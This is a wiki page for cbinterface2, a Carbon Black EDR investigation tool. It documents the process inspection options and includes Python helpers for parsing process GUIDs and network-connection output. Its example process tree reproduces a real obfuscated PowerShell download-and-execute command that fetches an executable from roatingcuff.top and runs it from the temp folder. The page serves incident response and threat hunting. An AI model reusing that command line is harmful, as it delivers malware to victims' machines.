ProcessInvestigation - ace-ecosystem/cbinterface2 GitHub Wiki

Process Investigation / Process Event Inspection

Use the process inspection interface to carve and parse process events. Any combination of the optional arguments can be used together, and those same arguments are also applied to every process that is recursively walked with the -w (--walk-tree) option.

NOTE: If you do not supply any optional arguments, the following inspection arguments are applied by default:

-i, --proc-info       show process information
-t, --process-tree    print the process tree with this process as the root.
-a, --process-ancestry
                        print the the process ancestry
-c, --show-children   print process children event details
-nc, --netconns       print network connections
-fm, --filemods       print file modifications
-rm, --regmods        print registry modifications
-ml, --modloads       print modloads
-sl, --scriptloads    print scriptloads (PSC)
-cp, --crossprocs     print crossprocs

All process inspection arguments:

$ cbinterface i -h
usage: cbinterface investigate [-h] [-i] [-w] [-t] [-a] [-c] [-nc]
                                      [-fm] [-rm] [-ml] [-sl] [-cp] [-rpe]
                                      [--json]
                                      process_guid_options

positional arguments:
  process_guid_options  the process GUID/segment to inspect. Segment is
                        optional.

optional arguments:
  -h, --help            show this help message and exit
  -i, --proc-info       show binary and process information
  -w, --walk-tree       Recursively walk, print, and inspect the process tree.
                        Specified arguments (ex. filemods) applied at every
                        process in tree. WARNING: can pull large datasets.
  -t, --process-tree    print the process tree with this process as the root.
  -a, --process-ancestry
                        print the the process ancestry
  -c, --show-children   only print process children event details
  -nc, --netconns       print network connections
  -fm, --filemods       print file modifications
  -rm, --regmods        print registry modifications
  -ml, --modloads       print modloads
  -sl, --scriptloads    print scriptloads (PSC)
  -cp, --crossprocs     print crossprocs
  -rpe, --raw-print-events
                        do not format Cb events onto a single line. Print them
                        the way Cb does by default.
  --json                Combine all results into json document and print the
                        result.

CB Response Process Segments

The Carbon Black Response product breaks process events up into process "segments".

Single Segment Specification

You can restrict inspection to a single process segment by passing a process whose process.current_segment is set to one of that process's existing segments. On the command line, this is done by passing the segment together with the process GUID, like so:

cbinterface inspect 00006a99-0000-59ac-01d6-feff3879acfd/1612887600302

All Segment Specification (default)

By default, if no single segment is specified (the current_segment field is not set on the Process object), the events from all of the process's segments are inspected.
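The following is an added example, not code from cbinterface2 itself, showing how the positional `GUID[/segment]` argument described in the two sections above can be parsed and how the "single segment vs. all segments" rule is applied. The GUID shapes it validates (CB Response `8-4-4-4-12` hex groups, PSC device prefix plus `8-8-8-15` hex groups) are assumptions inferred from the two sample GUIDs on this page, and the list of available segments is supplied by the caller rather than looked up from a server.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# GUID shapes are assumptions inferred from the two examples on this page:
# CB Response: 00006a99-0000-59ac-01d6-feff3879acfd            (hex 8-4-4-4-12)
# PSC:         7W2FQEEY-02361dc7-000009d4-00000000-1d70b8a6f55bfa7 (device prefix + hex 8-8-8-15)
CB_RESPONSE_GUID = re.compile(
    r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$", re.IGNORECASE
)
PSC_GUID = re.compile(
    r"^[A-Z0-9]{8}-[0-9a-f]{8}-[0-9a-f]{8}-[0-9a-f]{8}-[0-9a-f]{15}$", re.IGNORECASE
)


@dataclass(frozen=True)
class ProcessSpec:
    """A parsed 'GUID[/segment]' positional argument."""
    guid: str
    segment: Optional[int]  # None means "inspect every segment"
    product: str            # "response" or "psc"


def parse_process_spec(spec: str) -> ProcessSpec:
    """Split 'GUID/segment' into its parts and validate the GUID shape.

    Raises ValueError on anything that is not a recognised GUID, or on a
    segment that is not a positive integer, so a typo fails fast instead of
    quietly turning into a search for the wrong process.
    """
    guid, sep, seg = spec.strip().partition("/")
    if CB_RESPONSE_GUID.match(guid):
        product = "response"
    elif PSC_GUID.match(guid):
        product = "psc"
    else:
        raise ValueError(f"unrecognised process GUID: {guid!r}")
    segment: Optional[int] = None
    if sep:
        if not seg.isdigit() or int(seg) <= 0:
            raise ValueError(f"segment must be a positive integer: {seg!r}")
        segment = int(seg)
    return ProcessSpec(guid=guid, segment=segment, product=product)


def segments_to_inspect(spec: ProcessSpec, available: List[int]) -> List[int]:
    """Apply the rule from the text: a named segment selects only that segment,
    no segment selects all of them. 'available' is the list of segment IDs the
    caller already looked up for this process (hypothetical input here)."""
    if spec.segment is None:
        return sorted(available)
    if spec.segment not in available:
        raise ValueError(f"segment {spec.segment} does not exist for {spec.guid}")
    return [spec.segment]


if __name__ == "__main__":
    # Both GUIDs below are the ones shown on this page.
    single = parse_process_spec("00006a99-0000-59ac-01d6-feff3879acfd/1612887600302")
    every = parse_process_spec("7W2FQEEY-02361dc7-000009d4-00000000-1d70b8a6f55bfa7")
    print(single, segments_to_inspect(single, [1612887600302, 1612891200000]))
    print(every, segments_to_inspect(every, [3, 1, 2]))
```

Failing closed on a malformed GUID or a non-existent segment matters during an investigation: a silently "fixed" spec would pull events for a different process or segment than the analyst believes they are looking at.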

Process Investigation Examples

I used PSC for all of these examples but the commands are all interoperable.

Get process info

cbinterface i 7W2FQEEY-02361dc7-000009d4-00000000-1d70b8a6f55bfa7 -i

Print process ancestry and the process tree

$ cbinterface i 7W2FQEEY-02361dc7-000009d4-00000000-1d70b8a6f55bfa7 -a -t

------ Process Ancestry ------

  2021-02-25 10:25:23.200000-0500: "C:\Windows\System32\WScript.exe" "C:\Users\NeoLite6\Downloads\RenamedBadNess\RenamedBadNess.js"  | 7W2FQEEY-02361dc7-000009d4-00000000-1d70b8a6f55bfa7
    2021-02-23 08:47:52.351000-0500: C:\Windows\Explorer.EXE | 7W2FQEEY-02361dc7-00000fd0-00000000-1d709ea7b218d27
      2021-02-23 08:47:52.228000-0500: C:\Windows\system32\userinit.exe | 7W2FQEEY-02361dc7-00001368-00000000-1d709ea7b0ec532
        2021-02-23 08:47:16.322000-0500: winlogon.exe | 7W2FQEEY-02361dc7-000002dc-00000000-1d709ea65a7ff1d


------ Process Execution Tree ------

    "C:\Windows\System32\WScript.exe" "C:\Users\NeoLite6\Downloads\RenamedBadNess\RenamedBadNess.js"   | 7W2FQEEY-02361dc7-000009d4-00000000-1d70b8a6f55bfa7
      "C:\Windows\System32\cmd.exe" /c pOwEr^shEll -ex^ecution^pol^icy b^ypa^ss -n^oprof^ile -w h^idd^en $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://roatingcuff.top/leo3881/main.php','%temp%sDT76.exe'); & %temp%sDT76.exe & lKBAwPHfChLgeix  | 7W2FQEEY-02361dc7-00000a20-00000000-1d70b8a6f8788d9
        pOwErshEll  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://roatingcuff.top/leo3881/main.php','C:\Users\NeoLite6\AppData\Local\TempsDT76.exe');   | 7W2FQEEY-02361dc7-0000219c-00000000-1d70b8a6f996b9c
        C:\Users\NeoLite6\AppData\Local\TempsDT76.exe    | 7W2FQEEY-02361dc7-0000208c-00000000-1d70b8a71e4dff5
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1  | 7W2FQEEY-02361dc7-000004a4-00000000-1d70b8a6f8f5eea

Walk the process tree, printing network connections for every process, and grep for outbound connections

$ cbinterface i 7W2FQEEY-02361dc7-000009d4-00000000-1d70b8a6f55bfa7 -w -nc | grep outbound 
 @2021-02-25 10:25:24.772000-0500: Established outbound TCP from 10.0.2.15:58460 to 104.21.31.165:80 (roatingcuff.top)
 @2021-02-25 10:25:27.616000-0500: Established outbound TCP from 10.0.2.15:58461 to 158.69.7.238:443 (aws.amazon.com)
 @2021-02-25 10:25:29.323000-0500: Established outbound TCP from 10.0.2.15:58467 to 164.90.143.105:80 (hipporest.best)
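As an added example (not part of cbinterface2 or this wiki), the block below parses the single-line netconn output shown above and summarises where a walked process tree reached out to, so the remote endpoints can be tabulated for blocking and for pivots into proxy or DNS logs. The line layout is an assumption taken from the three sample lines on this page; the sample input is those same three lines.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple

# Pattern for cbinterface's one-line netconn output. The layout is assumed
# from the three sample lines on this page; other event types are not handled.
NETCONN_RE = re.compile(
    r"^\s*@(?P<ts>\d{4}-\d{2}-\d{2} [\d:.+-]+): "
    r"Established (?P<direction>inbound|outbound) (?P<proto>TCP|UDP) "
    r"from (?P<src_ip>[^\s:]+):(?P<src_port>\d+) "
    r"to (?P<dst_ip>[^\s:]+):(?P<dst_port>\d+)"
    r"(?: \((?P<domain>[^)]*)\))?\s*$"
)


@dataclass(frozen=True)
class NetConn:
    timestamp: str
    direction: str
    proto: str
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    domain: Optional[str]  # None when no name was resolved for the destination


def parse_netconn(line: str) -> Optional[NetConn]:
    """Return a NetConn for a cbinterface netconn line, or None for any other line."""
    m = NETCONN_RE.match(line)
    if not m:
        return None
    return NetConn(
        timestamp=m["ts"], direction=m["direction"], proto=m["proto"],
        src_ip=m["src_ip"], src_port=int(m["src_port"]),
        dst_ip=m["dst_ip"], dst_port=int(m["dst_port"]),
        domain=m["domain"] or None,
    )


def summarize_destinations(lines: Iterable[str]) -> Dict[Tuple[str, int, Optional[str]], int]:
    """Count outbound connections per (dst_ip, dst_port, domain) so an analyst
    sees every remote endpoint the tree contacted in one table."""
    counts: Counter = Counter()
    for line in lines:
        conn = parse_netconn(line)
        if conn and conn.direction == "outbound":
            counts[(conn.dst_ip, conn.dst_port, conn.domain)] += 1
    return dict(counts)


def cleartext_http_domains(lines: Iterable[str]) -> List[str]:
    """Domains contacted over plain TCP/80. In a download-and-execute tree these
    are where the payload fetch usually happens, so they are the first
    candidates for blocking and for proxy-log pivots."""
    domains = {
        conn.domain
        for conn in map(parse_netconn, lines)
        if conn and conn.direction == "outbound" and conn.proto == "TCP"
        and conn.dst_port == 80 and conn.domain
    }
    return sorted(domains)


# Sample input: the three lines printed by the grep above, copied from this page.
SAMPLE_NETCONN_LINES = [
    " @2021-02-25 10:25:24.772000-0500: Established outbound TCP from 10.0.2.15:58460 to 104.21.31.165:80 (roatingcuff.top)",
    " @2021-02-25 10:25:27.616000-0500: Established outbound TCP from 10.0.2.15:58461 to 158.69.7.238:443 (aws.amazon.com)",
    " @2021-02-25 10:25:29.323000-0500: Established outbound TCP from 10.0.2.15:58467 to 164.90.143.105:80 (hipporest.best)",
]

if __name__ == "__main__":
    for key, n in summarize_destinations(SAMPLE_NETCONN_LINES).items():
        print(key, n)
    print("cleartext HTTP domains:", cleartext_http_domains(SAMPLE_NETCONN_LINES))
```

In practice the input would be the stdout of `cbinterface i <guid> -w -nc` (piped into the script) rather than the embedded sample; lines that are not netconn events, such as the process headers the walk prints, are skipped by `parse_netconn` returning None.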